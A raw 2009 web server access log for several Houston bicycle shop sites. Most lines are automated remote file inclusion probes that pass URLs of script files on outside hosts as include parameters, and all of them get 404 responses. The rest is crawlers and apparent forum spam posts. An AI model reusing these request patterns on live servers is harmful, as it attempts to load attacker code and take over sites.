116.125.126.72 - - [10/Jun/2009:07:54:38 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
116.125.126.72 - - [10/Jun/2009:07:55:10 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
81.19.66.38 - - [10/Jun/2009:07:55:36 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:07:55:37 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:07:55:37 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:07:55:38 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:07:55:39 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:07:56:11 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:07:56:12 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:07:56:12 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:07:56:12 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:07:56:14 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:07:56:14 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:07:56:17 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:07:56:17 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "bicyclestoreshouston.com"
72.36.134.234 - - [10/Jun/2009:07:56:29 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:07:56:29 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:07:56:29 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:07:56:29 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:07:56:37 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:07:56:37 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:07:56:37 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:07:56:37 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
72.36.134.234 - - [10/Jun/2009:07:57:58 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.svbikes.com"
72.36.134.234 - - [10/Jun/2009:07:57:58 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.svbikes.com"
72.36.134.234 - - [10/Jun/2009:07:58:01 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://sunandsea.co.kr/upload/rey.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.svbikes.com"
72.36.134.234 - - [10/Jun/2009:07:58:17 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.svbikes.com"
72.36.134.234 - - [10/Jun/2009:07:58:17 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.svbikes.com"
72.36.134.234 - - [10/Jun/2009:07:58:20 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:07:59:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
66.249.68.210 - - [10/Jun/2009:08:00:20 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.svbikes.com"
66.249.68.210 - - [10/Jun/2009:08:00:20 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.svbikes.com"
218.38.29.124 - - [10/Jun/2009:08:01:20 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.38.29.124 - - [10/Jun/2009:08:01:21 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.38.29.124 - - [10/Jun/2009:08:04:55 -0700] "GET /translations/Czech.txt//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.38.29.124 - - [10/Jun/2009:08:04:57 -0700] "GET /translations/Turkish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
218.38.29.124 - - [10/Jun/2009:08:04:57 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
218.38.29.124 - - [10/Jun/2009:08:04:57 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
218.38.29.124 - - [10/Jun/2009:08:04:59 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
74.52.2.130 - - [10/Jun/2009:08:06:45 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ingrus.net/sox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
74.52.2.130 - - [10/Jun/2009:08:06:48 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ingrus.net/sox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
74.52.2.130 - - [10/Jun/2009:08:06:48 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ingrus.net/sox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
218.38.29.124 - - [10/Jun/2009:08:07:02 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
218.38.29.124 - - [10/Jun/2009:08:07:03 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
218.38.29.124 - - [10/Jun/2009:08:07:03 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
222.122.160.145 - - [10/Jun/2009:08:07:43 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "houstonbikeshop.com"
222.122.160.145 - - [10/Jun/2009:08:07:43 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:07:32 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:32 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:32 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:32 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:32 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:32 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:32 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:33 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:33 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:41 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:41 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:07:41 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.146.100 - - [10/Jun/2009:09:07:46 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.146.100 - - [10/Jun/2009:09:07:46 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.146.100 - - [10/Jun/2009:09:07:46 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.146.100 - - [10/Jun/2009:09:07:54 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.146.100 - - [10/Jun/2009:09:09:05 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.146.100 - - [10/Jun/2009:09:09:05 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.146.100 - - [10/Jun/2009:09:09:05 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.146.100 - - [10/Jun/2009:09:09:05 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:08 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:08 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:08 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:10 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:10 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:10 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:13 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:14 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:15 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:15 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.219.232.137 - - [10/Jun/2009:09:09:18 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.146.100 - - [10/Jun/2009:09:12:39 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.146.100 - - [10/Jun/2009:09:12:39 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:14:30 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:14:45 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:14:45 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:14:45 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:14:45 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
118.219.232.137 - - [10/Jun/2009:09:14:45 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [10/Jun/2009:09:21:13 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [10/Jun/2009:09:21:15 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [10/Jun/2009:09:21:16 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [10/Jun/2009:09:21:55 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [10/Jun/2009:09:25:42 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [10/Jun/2009:09:25:42 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [10/Jun/2009:09:25:42 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [10/Jun/2009:09:25:46 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:09:25:59 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
217.147.29.190 - - [10/Jun/2009:09:26:38 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.29.190 - - [10/Jun/2009:09:26:38 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.29.190 - - [10/Jun/2009:09:26:39 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.29.190 - - [10/Jun/2009:09:26:39 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.29.190 - - [10/Jun/2009:09:28:01 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [10/Jun/2009:09:28:10 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [10/Jun/2009:09:28:23 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.29.190 - - [10/Jun/2009:09:28:26 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.waxzone.net//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [10/Jun/2009:09:28:29 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [10/Jun/2009:09:28:33 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [10/Jun/2009:09:28:33 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [10/Jun/2009:09:28:33 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.67.243 - - [10/Jun/2009:09:35:42 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:09:39:47 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:09:49:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.8.201.80 - - [10/Jun/2009:09:58:50 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; (R1 1.6); .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
91.8.201.80 - - [10/Jun/2009:09:58:54 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; (R1 1.6); .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
91.8.201.80 - - [10/Jun/2009:09:59:14 -0700] "GET /P1000199.JPG HTTP/1.1" 200 983040 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; (R1 1.6); .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
